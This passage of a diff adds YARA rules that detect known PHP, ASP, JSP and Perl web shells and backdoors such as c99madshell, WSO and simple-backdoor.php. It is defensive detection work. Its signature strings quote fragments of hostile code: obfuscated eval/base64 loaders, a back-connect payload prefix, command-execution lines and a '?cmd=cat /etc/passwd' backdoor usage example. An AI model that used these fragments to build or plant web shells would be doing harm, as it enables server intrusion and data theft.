+	condition:
+		1 of them
+}
+rule lurm_safemod_on_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5ea4f901ce1abdf20870c214b3231db3"
+	strings:
+		$s0 = "Network security team :: CGI Shell" fullword
+		$s1 = "#########################<<KONEC>>#####################################" fullword
+		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+	condition:
+		1 of them
+}
+rule c99madshell_v2_0_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d27292895da9afa5b60b9d3014f39294"
+	strings:
+		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
+	condition:
+		all of them
+}
+rule backupsql_php_often_with_c99shell {
+	meta:
+		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
+	strings:
+		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
+		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+	condition:
+		all of them
+}
+rule uploader_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file uploader.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0b53b67bb3b004a8681e1458dd1895d0"
+	strings:
+		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+	condition:
+		2 of them
+}
+rule telnet_pl {
+	meta:
+		description = "Semi-Auto-generated  - file telnet.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "dd9dba14383064e219e29396e242c1ec"
+	strings:
+		$s0 = "W A R N I N G: Private Server"
+		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
+	condition:
+		all of them
+}
+rule w3d_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file w3d.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "987f66b29bfb209a0b4f097f84f57c3b"
+	strings:
+		$s0 = "W3D Shell"
+		$s1 = "By: Warpboy"
+		$s2 = "No Query Executed"
+	condition:
+		2 of them
+}
+rule WebShell_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
+	strings:
+		$s0 = "WebShell.cgi"
+		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
+	condition:
+		all of them
+}
+rule WinX_Shell_html {
+	meta:
+		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+	strings:
+		$s0 = "WinX Shell"
+		$s1 = "Created by greenwood from n57"
+		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
+	condition:
+		2 of them
+}
+rule Dx_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Dx.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+	strings:
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
+	condition:
+		1 of them
+}
+rule csh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file csh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
+	strings:
+		$s0 = ".::[c0derz]::. web-shell"
+		$s1 = "http://c0derz.org.ua"
+		$s2 = "vint21h@c0derz.org.ua"
+		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
+	condition:
+		1 of them
+}
+rule pHpINJ_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d7a4b0df45d34888d5a09f745e85733f"
+	strings:
+		$s1 = "News Remote PHP Shell Injection"
+		$s3 = "Php Shell <br />" fullword
+		$s4 = "<input type = \"text\" name = \"url\" value = \""
+	condition:
+		2 of them
+}
+rule sig_2008_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file 2008.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "3e4ba470d4c38765e4b16ed930facf2c"
+	strings:
+		$s0 = "Codz by angel(4ngel)"
+		$s1 = "Web: http://www.4ngel.net"
+		$s2 = "$admin['cookielife'] = 86400;"
+		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
+	condition:
+		1 of them
+}
+rule ak74shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7f83adcb4c1111653d30c6427a94f66f"
+	strings:
+		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
+		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
+		$s3 = "$xshell"
+	condition:
+		2 of them
+}
+rule Rem_View_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+	strings:
+		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 ="Welcome to phpRemoteView (RemView)"
+	condition:
+		1 of them
+}
+rule Java_Shell_js {
+	meta:
+		description = "Semi-Auto-generated  - file Java Shell.js.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+	strings:
+		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
+		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
+		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
+	condition:
+		2 of them
+}
+rule STNC_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file STNC.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
+	strings:
+		$s0 = "drmist.ru" fullword
+		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
+		$s2 = "STNC WebShell"
+		$s3 = "http://www.security-teams.net/index.php?showtopic="
+	condition:
+		1 of them
+}
+rule aZRaiLPhp_v1_0_php {
+	meta:
+		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "26b2d3943395682e36da06ed493a3715"
+	strings:
+		$s0 = "azrailphp"
+		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
+		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
+	condition:
+		2 of them
+}
+rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php {
+	meta:
+		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
+	strings:
+		$s0 = ";$sd98=\"john.barker446@gmail.com\""
+		$s1 = "print \"Sending mail to $to....... \";"
+		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
+	condition:
+		1 of them
+}
+rule zacosmall_php {
+	meta:
+		description = "Semi-Auto-generated  - file zacosmall.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+	strings:
+		$s0 = "rand(1,99999);$sj98"
+		$s1 = "$dump_file.='`'.$rows2[0].'`"
+		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
+	condition:
+		2 of them
+}
+rule CmdAsp_asp {
+	meta:
+		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "64f24f09ec6efaa904e2492dffc518b9"
+	strings:
+		$s0 = "CmdAsp.asp"
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s2 = "-- Use a poor man's pipe ... a temp file --"
+		$s3 = "maceo @ dogmile.com"
+	condition:
+		2 of them
+}
+rule simple_backdoor_php {
+	meta:
+		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+	strings:
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+	condition:
+		2 of them
+}
+rule mysql_shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d42aec2891214cace99b3eb9f3e21a63"
+	strings:
+		$s0 = "SooMin Kim"
+		$s1 = "smkim@popeye.snu.ac.kr"
+		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
+	condition:
+		1 of them
+}
+rule Dive_Shell_1_0___Emperor_Hacking_Team_php {
+	meta:
+		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1b5102bdc41a7bc439eea8f0010310a5"
+	strings:
+		$s0 = "Emperor Hacking TEAM"
+		$s1 = "Simshell" fullword
+		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
+		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
+	condition:
+		2 of them
+}
+rule Asmodeus_v0_1_pl {
+	meta:
+		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0978b672db0657103c79505df69cb4bb"
+	strings:
+		$s0 = "[url=http://www.governmentsecurity.org"
+		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
+		$s2 = "print \"Asmodeus Perl Remote Shell"
+		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
+	condition:
+		2 of them
+}
+rule backup_php_often_with_c99shell {
+	meta:
+		description = "Semi-Auto-generated  - file backup.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "aeee3bae226ad57baf4be8745c3f6094"
+	strings:
+		$s0 = "#phpMyAdmin MySQL-Dump" fullword
+		$s2 = ";db_connect();header('Content-Type: application/octetstr"
+		$s4 = "$data .= \"#Database: $database" fullword
+	condition:
+		all of them
+}
+rule Reader_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Reader.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+	strings:
+		$s1 = "Mehdi & HolyDemon"
+		$s2 = "www.infilak."
+		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
+	condition:
+		2 of them
+}
+rule phpshell17_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpshell17.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
+	strings:
+		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
+		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
+		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
+	condition:
+		1 of them
+}
+rule myshell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file myshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "62783d1db52d05b1b6ae2403a7044490"
+	strings:
+		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
+		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
+		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
+	condition:
+		2 of them
+}
+rule SimShell_1_0___Simorgh_Security_MGZ_php {
+	meta:
+		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
+	strings:
+		$s0 = "Simorgh Security Magazine "
+		$s1 = "Simshell.css"
+		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
+		$s3 = "www.simorgh-ev.com"
+	condition:
+		2 of them
+}
+rule jspshall_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
+	strings:
+		$s0 = "kj021320"
+		$s1 = "case 'T':systemTools(out);break;"
+		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
+	condition:
+		2 of them
+}
+rule webshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file webshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "e425241b928e992bde43dd65180a4894"
+	strings:
+		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
+		$s3 = "PHP Web Shell"
+	condition:
+		all of them
+}
+rule rootshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file rootshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "265f3319075536030e59ba2f9ef3eac6"
+	strings:
+		$s0 = "shells.dl.am"
+		$s1 = "This server has been infected by $owner"
+		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
+		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
+	condition:
+		2 of them
+}
+rule connectback2_pl {
+	meta:
+		description = "Semi-Auto-generated  - file connectback2.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "473b7d226ea6ebaacc24504bd740822e"
+	strings:
+		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
+		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
+		$s2 = "ConnectBack Backdoor"
+	condition:
+		1 of them
+}
+rule DefaceKeeper_0_2_php {
+	meta:
+		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "713c54c3da3031bc614a8a55dccd7e7f"
+	strings:
+		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
+		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
+		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
+	condition:
+		1 of them
+}
+rule shells_PHP_wso {
+	meta:
+		description = "Semi-Auto-generated  - file wso.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "33e2891c13b78328da9062fbfcf898b6"
+	strings:
+		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
+		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
+	condition:
+		1 of them
+}
+rule backdoor1_php {
+	meta:
+		description = "Semi-Auto-generated  - file backdoor1.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "e1adda1f866367f52de001257b4d6c98"
+	strings:
+		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
+		$s2 = "class backdoor {"
+		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
+	condition:
+		1 of them
+}
+rule elmaliseker_asp {
+	meta:
+		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+	strings:
+		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
+		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
+		$s2 = "dim zombie_array,special_array"
+		$s3 = "http://vnhacker.org"
+	condition:
+		1 of them
+}
+rule indexer_asp {
+	meta:
+		description = "Semi-Auto-generated  - file indexer.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+	strings:
+		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
+	condition:
+		1 of them
+}
+rule DxShell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "33a2b31810178f4c2e71fbdeb4899244"
+	strings:
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
+	condition:
+		1 of them
+}
+rule s72_Shell_v1_1_Coding_html {
+	meta:
+		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+	strings:
+		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
+		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
+		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
+	condition:
+		1 of them
+}
+rule hidshell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file hidshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c2f3327d60884561970c63ffa09439a4"
+	strings:
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+	condition:
+		all of them
+}
+rule kacak_asp {
+	meta:
+		description = "Semi-Auto-generated  - file kacak.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "907d95d46785db21331a0324972dda8c"
+	strings:
+		$s0 = "Kacak FSO 1.0"
+		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
+		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
+		$s4 = "mailto:BuqX@hotmail.com"
+	condition:
+		1 of them
+}
+rule PHP_Backdoor_Connect_pl_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "57fcd9560dac244aeaf95fd606621900"
+	strings:
+		$s0 = "LorD of IRAN HACKERS SABOTAGE"
+		$s1 = "LorD-C0d3r-NT"
+		$s2 = "echo --==Userinfo==-- ;"
+	condition:
+		1 of them
+}
+rule Antichat_Socks5_Server_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
+	strings:
+		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
+		$s3 = "#   [+] Domain name address type"
+		$s4 = "www.antichat.ru"
+	condition:
+		1 of them
+}
+rule Antichat_Shell_v1_3_php {
+	meta:
+		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "40d0abceba125868be7f3f990f031521"
+	strings:
+		$s0 = "Antichat"
+		$s1 = "Can't open file, permission denide"
+		$s2 = "$ra44"
+	condition:
+		2 of them
+}
+rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php {
+	meta:
+		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+	strings:
+		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
+		$s1 = "Mode Shell v1.0</font></span>"
+		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
+	condition:
+		1 of them
+}
+rule mysql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "12bbdf6ef403720442a47a3cc730d034"
+	strings:
+		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
+		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
+	condition:
+		1 of them
+}
+rule Worse_Linux_Shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+	strings:
+		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
+		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
+	condition:
+		1 of them
+}
+rule cyberlords_sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "03b06b4183cb9947ccda2c3d636406d4"
+	strings:
+		$s0 = "Coded by n0 [nZer0]"
+		$s1 = " www.cyberlords.net"
+		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
+		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
+	condition:
+		1 of them
+}
+rule cmd_asp_5_1_asp {
+	meta:
+		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+	strings:
+		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
+		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+	condition:
+		1 of them
+}
+rule pws_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file pws.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
+	strings:
+		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
+		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
+		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
+	condition:
+		2 of them
+}
+rule PHP_Shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+	strings:
+		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+	condition:
+		all of them
+}
+rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html {
+	meta:
+		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
+	strings:
+		$s0 = "Ayyildiz"
+		$s1 = "TouCh By iJOo"
+		$s2 = "First we check if there has been asked for a working directory"
+		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
+	condition:
+		2 of them
+}
+rule EFSO_2_asp {
+	meta:
+		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
+	strings:
+		$s0 = "Ejder was HERE"
+		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
+	condition:
+		2 of them
+}
+rule lamashell_php {
+	meta:
+		description = "Semi-Auto-generated  - file lamashell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "de9abc2e38420cad729648e93dfc6687"
+	strings:
+		$s0 = "lama's'hell" fullword
+		$s1 = "if($_POST['king'] == \"\") {"
+		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
+	condition:
+		1 of them
+}
+rule Ajax_PHP_Command_Shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "93d1a2e13a3368a2472043bd6331afe9"
+	strings:
+		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
+		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
+		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
+	condition:
+		1 of them
+}
+rule JspWebshell_1_2_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "70a0ee2624e5bbe5525ccadc467519f6"
+	strings:
+		$s0 = "JspWebshell"
+		$s1 = "CreateAndDeleteFolder is error:"
+		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
+		$s3 = "String _password =\"111\";"
+	condition:
+		2 of them
+}
+rule Sincap_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b68b90ff6012a103e57d141ed38a7ee9"
+	strings:
+		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
+		$s2 = "$tampon4=$tampon3-1"
+		$s3 = "@aventgrup.net"
+	condition:
+		2 of them
+}
+rule Test_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Test.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "77e331abd03b6915c6c6c7fe999fcb50"
+	strings:
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
+		$s2 = "fwrite ($fp, \"$yazi\");" fullword
+		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
+	condition:
+		1 of them
+}
+rule Phyton_Shell_py {
+	meta:
+		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "92b3c897090867c65cc169ab037a0f55"
+	strings:
+		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
